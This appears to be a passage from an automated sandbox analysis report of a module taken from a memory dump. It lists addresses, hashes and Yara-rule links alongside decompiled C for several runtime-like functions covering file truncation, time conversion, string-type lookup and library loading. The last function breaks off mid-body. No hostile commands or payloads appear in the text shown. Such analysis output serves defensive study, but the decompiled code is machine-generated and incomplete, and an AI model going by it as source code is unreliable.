    0x6e2109f5
    0x6e2109f9
    0x6e2109fc
    0x6e2109ff
    0x6e210a01
    0x6e210a01
    0x6e210a01
    0x6e210a03
    0x6e210a06
    0x6e210a09
    0x6e210a0b
    0x6e210a13
    0x6e210a19
    0x6e210a1c
    0x6e210a1f
    0x6e210a20
    0x6e210a23
    0x6e210a26
    0x6e210a26
    0x6e210a2b
    0x6e210a2e
    0x00000000
    0x00000000
    0x6e210a46
    0x6e210a4b
    0x6e210a4f
    0x00000000
    0x00000000
    0x6e210a53
    0x6e210a56
    0x6e210a57
    0x6e210a57
    0x6e210a59
    0x6e210a5c
    0x00000000
    0x00000000
    0x6e210a5e
    0x6e210a61
    0x6e210a68
    0x6e210a6b
    0x6e210a6e
    0x6e210a84
    0x6e210a84
    0x6e210a84
    0x6e210a70
    0x6e210a70
    0x6e210a72
    0x6e210a75
    0x6e210a80
    0x6e210a77
    0x6e210a7a
    0x6e210a7a
    0x6e210a75
    0x00000000
    0x6e210a6e
    0x6e210a63
    0x6e210a63
    0x6e210a65
    0x6e210a65
    0x6e2109b9
    0x6e2109b9
    0x6e2109bc
    0x6e210a87
    0x6e210a87
    0x6e210a89
    0x6e210a8b
    0x6e210a8e
    0x6e210a8f
    0x6e210a90
    0x6e210a91
    0x6e210a99
    0x6e210a99
    0x6e210a99
    0x6e210a9b
    0x6e210a9e
    0x6e210aa1
    0x6e210aa3
    0x6e210aa3
    0x6e210aa5
    0x6e210ab7
    0x6e210abb
    0x6e210abe
    0x6e210ac5
    0x6e210acd
    0x6e210acd
    0x6e210ad0
    0x6e210ad2
    0x6e210ae3
    0x6e210ae3
    0x6e210ae7
    0x6e210ae7
    0x6e210aea
    0x6e210aec
    0x6e210aef
    0x00000000
    0x6e210ad4
    0x6e210ad4
    0x6e210ada
    0x6e210ada
    0x6e210ade
    0x6e210af1
    0x6e210af1
    0x6e210af5
    0x6e210af6
    0x6e210af8
    0x6e210afa
    0x6e210b3b
    0x6e210b3b
    0x6e210b3d
    0x6e210b4a
    0x6e210b4a
    0x6e210b4c
    0x6e210b4e
    0x6e210b4f
    0x6e210b50
    0x6e210b57
    0x6e210b5a
    0x6e210b5c
    0x6e210b5c
    0x6e210b5d
    0x6e210b5f
    0x6e210b62
    0x6e210b62
    0x6e210b64
    0x6e210b66
    0x00000000
    0x6e210b66
    0x6e210b3f
    0x6e210b41
    0x00000000
    0x00000000
    0x6e210b43
    0x00000000
    0x00000000
    0x6e210b45
    0x6e210b48
    0x00000000
    0x00000000
    0x00000000
    0x6e210b48
    0x6e210b01
    0x6e210b07
    0x6e210b07
    0x6e210b09
    0x6e210b0a
    0x6e210b0b
    0x6e210b0c
    0x6e210b13
    0x6e210b16
    0x6e210b18
    0x6e210b19
    0x6e210b1b
    0x6e210b28
    0x6e210b28
    0x6e210b2a
    0x6e210b2c
    0x6e210b2d
    0x6e210b2e
    0x6e210b35
    0x6e210b38
    0x6e210b3a
    0x6e210b3a
    0x00000000
    0x6e210b3a
    0x6e210b1d
    0x6e210b1d
    0x6e210b1f
    0x00000000
    0x00000000
    0x6e210b21
    0x00000000
    0x00000000
    0x6e210b23
    0x6e210b26
    0x00000000
    0x00000000
    0x00000000
    0x6e210b26
    0x6e210b03
    0x6e210b05
    0x00000000
    0x00000000
    0x00000000
    0x6e210b05
    0x6e210ad6
    0x6e210ad8
    0x00000000
    0x00000000
    0x00000000
    0x6e210ad8
    0x6e210ad2
    0x00000000
    0x6e2109bc
    0x6e2109b7
    0x6e2108de
    0x6e2108e0
    0x00000000
    0x6e2108e2
    0x6e2108f8
    0x6e2108fd
    0x6e2108ff
    0x6e21090b
    0x6e210911
    0x6e210912
    0x6e210914
    0x6e210916
    0x6e210921
    0x6e210921
    0x6e210924
    0x6e210926
    0x6e210926
    0x6e210929
    0x6e210901
    0x6e210901
    0x6e210901
    0x00000000
    0x6e2108ff
    0x6e2108ae
    0x6e2108ae
    0x6e2108b5
    0x6e2108b6
    0x6e2108b8
    0x6e210b6a
    0x6e210b6e
    0x6e210b73
    0x6e210b73
    0x6e210b82
    0x6e210b82

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: dfd600f243ab01e0d60354f1a2019f331615495e1cf0aaaa4257a0baf1d4dd4c
    • Instruction ID: 9a8d40b3416f9caa5883ee4430d420c8d84a67a076b05d4e6f19a80ce68907bd
    • Opcode Fuzzy Hash: dfd600f243ab01e0d60354f1a2019f331615495e1cf0aaaa4257a0baf1d4dd4c
    • Instruction Fuzzy Hash: 3DA1467291838F9FE7118F98C8A0FEEBBEAEF55304F144569D7959B280E2348B52C750
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E214C03, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E6E214C03(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E6E2158E2(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E6E2158E2(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E6E2158E2(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E6E20BB7E()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E6E2158E2(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E6E21414E(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E6E20BB7E())) = 0xd;
							_t30 = E6E20BB6B();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E6E20FB55(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E6E214A6B(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E6E214833(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E6E20BB6B();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E6E20BB7E())) = 0xd;
										}
										L23:
										_t38 = E6E20BB7E();
										E6E20FBB2(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E6E214A6B(_t56, _t59, _v12);
							E6E20FBB2(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E6E20BB7E())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E6E20BB7E()));
			}
































    0x6e214c03
    0x6e214c0d
    0x6e214c10
    0x6e214c17
    0x6e214c1e
    0x6e214c23
    0x6e214c26
    0x6e214c2c
    0x6e214c3f
    0x6e214c46
    0x6e214c49
    0x6e214c4b
    0x6e214c4e
    0x00000000
    0x00000000
    0x6e214c54
    0x6e214c54
    0x6e214c56
    0x6e214c59
    0x6e214c5b
    0x6e214c5e
    0x6e214d3c
    0x6e214d3c
    0x6e214d3e
    0x6e214cf5
    0x6e214cfd
    0x6e214d07
    0x6e214d0a
    0x6e214d8b
    0x6e214d8b
    0x6e214d8d
    0x00000000
    0x6e214d8d
    0x6e214d0c
    0x6e214d11
    0x00000000
    0x6e214d11
    0x6e214d40
    0x6e214d46
    0x6e214d4e
    0x6e214d55
    0x6e214d58
    0x6e214d5b
    0x00000000
    0x00000000
    0x6e214d65
    0x6e214d6b
    0x6e214d6d
    0x00000000
    0x00000000
    0x6e214d74
    0x6e214d7a
    0x6e214d87
    0x00000000
    0x6e214d87
    0x6e214d42
    0x6e214d44
    0x00000000
    0x00000000
    0x00000000
    0x6e214d44
    0x6e214c64
    0x6e214c6e
    0x6e214c7a
    0x6e214c7d
    0x6e214c7e
    0x6e214c80
    0x6e214c9e
    0x6e214ca1
    0x6e214ca4
    0x6e214ca5
    0x6e214ca5
    0x6e214ca7
    0x6e214cba
    0x6e214cba
    0x6e214cbc
    0x6e214cbf
    0x6e214cc4
    0x6e214cc7
    0x6e214cca
    0x6e214d15
    0x6e214d1a
    0x6e214d1d
    0x6e214d24
    0x6e214d24
    0x6e214d2a
    0x6e214d2a
    0x6e214d32
    0x6e214d38
    0x00000000
    0x6e214d38
    0x6e214ccc
    0x6e214ccd
    0x6e214ccf
    0x6e214cd2
    0x6e214cd4
    0x6e214cd7
    0x6e214cd9
    0x6e214cb3
    0x6e214cb3
    0x00000000
    0x6e214cb3
    0x6e214cdb
    0x00000000
    0x00000000
    0x00000000
    0x6e214cdb
    0x6e214ca9
    0x00000000
    0x00000000
    0x6e214cab
    0x6e214cb1
    0x00000000
    0x00000000
    0x00000000
    0x6e214cdd
    0x6e214cdd
    0x6e214cdd
    0x6e214ce5
    0x6e214ceb
    0x6e214cf0
    0x6e214cf3
    0x6e214cf3
    0x00000000
    0x6e214cf3
    0x6e214c87
    0x00000000
    0x6e214c87
    0x6e214c66
    0x6e214c68
    0x00000000
    0x00000000
    0x00000000
    0x6e214c68
    0x6e214c2e
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: af1485816ac67468fbb171323ce81a7c10b1cefe1ee94ebde3b60ba4f279fe01
    • Instruction ID: 2bced998d7ee33749d69d07273488a6621d11ccb77db76a97d8559414fee5c2b
    • Opcode Fuzzy Hash: af1485816ac67468fbb171323ce81a7c10b1cefe1ee94ebde3b60ba4f279fe01
    • Instruction Fuzzy Hash: 4E412535A4850EABDB205FF88C40AEE3AFFEF4277DF200A55EA1D96294D73486434661
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20A2E0, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E6E20A2E0(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E6E20A42D(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E6E21F3C0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x6e23ff80;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x6e23ff4c;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E6E21F3C0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E6E21F3C0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E6E21F3C0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E6E20BB7E();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E6E20BB7E();
					_t102 = 0x16;
					 *_t69 = _t102;
					E6E208929();
					goto L11;
				}
				_t71 = E6E20BB7E();
				_t103 = 0x16;
				 *_t71 = _t103;
				E6E208929();
				return _t103;
			}
































    0x6e20a2e9
    0x6e20a2ee
    0x6e20a30e
    0x6e20a30f
    0x6e20a311
    0x6e20a314
    0x6e20a316
    0x6e20a329
    0x6e20a32c
    0x6e20a32e
    0x6e20a331
    0x6e20a334
    0x6e20a337
    0x6e20a342
    0x6e20a344
    0x6e20a345
    0x6e20a347
    0x6e20a363
    0x6e20a367
    0x6e20a370
    0x6e20a375
    0x6e20a37c
    0x6e20a389
    0x6e20a38e
    0x6e20a398
    0x6e20a39d
    0x6e20a3a2
    0x6e20a3a4
    0x6e20a3ab
    0x6e20a3ad
    0x6e20a3ad
    0x6e20a3b2
    0x6e20a3b7
    0x6e20a3b8
    0x6e20a3bb
    0x6e20a3c3
    0x6e20a3c3
    0x6e20a3c4
    0x6e20a3d2
    0x6e20a3da
    0x6e20a3e7
    0x6e20a3e8
    0x6e20a3f2
    0x6e20a3f8
    0x6e20a402
    0x6e20a409
    0x6e20a40d
    0x6e20a411
    0x6e20a416
    0x6e20a41a
    0x6e20a422
    0x6e20a422
    0x6e20a424
    0x6e20a427
    0x00000000
    0x6e20a3bd
    0x6e20a3bd
    0x6e20a3bd
    0x6e20a3be
    0x6e20a3be
    0x00000000
    0x6e20a3bd
    0x6e20a3bb
    0x6e20a349
    0x6e20a352
    0x6e20a352
    0x6e20a359
    0x6e20a35a
    0x6e20a35c
    0x6e20a35c
    0x00000000
    0x6e20a35c
    0x6e20a34b
    0x6e20a350
    0x00000000
    0x00000000
    0x00000000
    0x6e20a350
    0x6e20a339
    0x00000000
    0x00000000
    0x6e20a33b
    0x6e20a340
    0x00000000
    0x00000000
    0x00000000
    0x6e20a340
    0x6e20a318
    0x6e20a31f
    0x6e20a320
    0x6e20a322
    0x00000000
    0x6e20a322
    0x6e20a2f0
    0x6e20a2f7
    0x6e20a2f8
    0x6e20a2fa
    0x00000000

    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d05cb682dfb22388336bb239f451bf6b9ee345bd83ec272b706c5c9478397274
    • Instruction ID: ba9a1b06a7aa16593987c3fec6db9f55c1c5bdbf5825eeebdf50f155ffcf0ac8
    • Opcode Fuzzy Hash: d05cb682dfb22388336bb239f451bf6b9ee345bd83ec272b706c5c9478397274
    • Instruction Fuzzy Hash: B041C4B5A4034CAFE3149FF8C841BDBBBEAEB89714F60892AE155DB6C0D77199418780
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E215C7C, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E6E215C7C(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				void* _t65;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t34 ^ _t70;
				E6E209118(__ebx,  &_v28, _t65, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E203D51(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E6E2057E0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E6E2035A7(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E6E20FBEC(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E204540();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}





















    0x6e215c84
    0x6e215c8b
    0x6e215c97
    0x6e215c9c
    0x6e215ca1
    0x6e215ca6
    0x6e215ca6
    0x6e215ca9
    0x6e215cab
    0x6e215cab
    0x6e215cb0
    0x6e215cc9
    0x6e215ccf
    0x6e215cd4
    0x6e215d73
    0x6e215d77
    0x6e215d7c
    0x6e215d7c
    0x6e215d98
    0x6e215d98
    0x6e215cda
    0x6e215cdd
    0x6e215ce2
    0x6e215ce6
    0x6e215d32
    0x6e215d34
    0x6e215d36
    0x6e215d3b
    0x6e215d52
    0x6e215d5a
    0x6e215d6a
    0x6e215d6a
    0x6e215d5a
    0x6e215d6c
    0x6e215d6d
    0x00000000
    0x6e215d72
    0x6e215ce8
    0x6e215ced
    0x6e215cef
    0x6e215cf1
    0x6e215cf1
    0x6e215cf9
    0x6e215d16
    0x6e215d20
    0x6e215d25
    0x00000000
    0x00000000
    0x6e215d27
    0x6e215d2d
    0x6e215d2d
    0x00000000
    0x6e215d2d
    0x6e215cfd
    0x6e215d01
    0x6e215d06
    0x6e215d0a
    0x00000000
    0x00000000
    0x6e215d0c
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E23F9E8,00000000,00000000,8B56FF8B,6E21142E,?,00000004,00000001,6E23F9E8,0000007F,?,8B56FF8B,00000001), ref: 6E215CC9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E215D52
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E215D64
    • __freea.LIBCMT ref: 6E215D6D
      • Part of subcall function 6E20FBEC: HeapAlloc.KERNEL32(00000000,0000060B,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FC1E
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
    • String ID:
    • API String ID: 573072132-0
    • Opcode ID: 862929316ac573efff856254645a7c4afdfa3d443cf84590ddfb17493c74f868
    • Instruction ID: 2b24041f56ffc5a77c21129db069ecaf78bb095b2cbcbfa05bb2ad15f4c23497
    • Opcode Fuzzy Hash: 862929316ac573efff856254645a7c4afdfa3d443cf84590ddfb17493c74f868
    • Instruction Fuzzy Hash: E8319D72A0020AAFDF258FA4CC58EEE7BEAEB44614B044568ED14DB190E735CA55CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21365C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E6E21365C(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e2e3980 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e23ffb8 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x1dc3c770
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










    0x6e213661
    0x6e213665
    0x6e21366c
    0x6e213670
    0x6e21367e
    0x6e213694
    0x6e213698
    0x6e2136c1
    0x6e2136c3
    0x6e2136c7
    0x6e2136ca
    0x6e2136ca
    0x6e2136d0
    0x6e2136d2
    0x00000000
    0x6e2136d3
    0x6e21369a
    0x6e2136a3
    0x6e2136b2
    0x6e2136a5
    0x6e2136a8
    0x6e2136ae
    0x6e2136ae
    0x6e2136b6
    0x00000000
    0x6e2136b8
    0x6e2136bb
    0x6e2136bd
    0x00000000
    0x6e2136bd
    0x6e2136b6
    0x6e213672
    0x6e213677
    0x00000000

    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0000060B,00000000,00000000,?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,FlsSetValue), ref: 6E21368E
    • GetLastError.KERNEL32(?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,FlsSetValue,6E240580,FlsSetValue,00000000,00000364,?,6E20FAD8), ref: 6E21369A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E213603,0000060B,00000000,00000000,00000000,?,6E21392F,00000006,FlsSetValue,6E240580,FlsSetValue,00000000), ref: 6E2136A8
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: 288f36e14a5d6d8a51dccd5fc06012f27270bb6428e2759070bbaa89aa7cabf1
    • Instruction ID: 003f04c8bed7a8f800660054ddba52b8b4b852e8fe10b1ddbdd8b17d0c90ab75
    • Opcode Fuzzy Hash: 288f36e14a5d6d8a51dccd5fc06012f27270bb6428e2759070bbaa89aa7cabf1
    • Instruction Fuzzy Hash: 0501D83275966B9FC7214AA98C4DEC6B7DBBF46BE17120520FA05D7340C721D904CAF8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F8730, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E6E1F8730() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _t19;
				signed int _t22;
				signed int _t26;
				intOrPtr _t29;
				signed int _t38;
				signed int _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t46;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t57;
				signed int _t63;
				signed int _t71;
				intOrPtr _t72;
				signed int _t74;
				signed int _t76;
				intOrPtr _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				intOrPtr _t90;
				signed int _t94;
				intOrPtr _t97;
				signed int _t99;
				intOrPtr _t101;
				signed int _t105;
				intOrPtr _t106;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t116;
				signed int _t118;

				_t19 =  *0x6e24b0d8; // 0xf1cde0
				 *0x6e24b008 = _t19 + 5 -  *0x6e24b000;
				 *0x6e24b00c = 0;
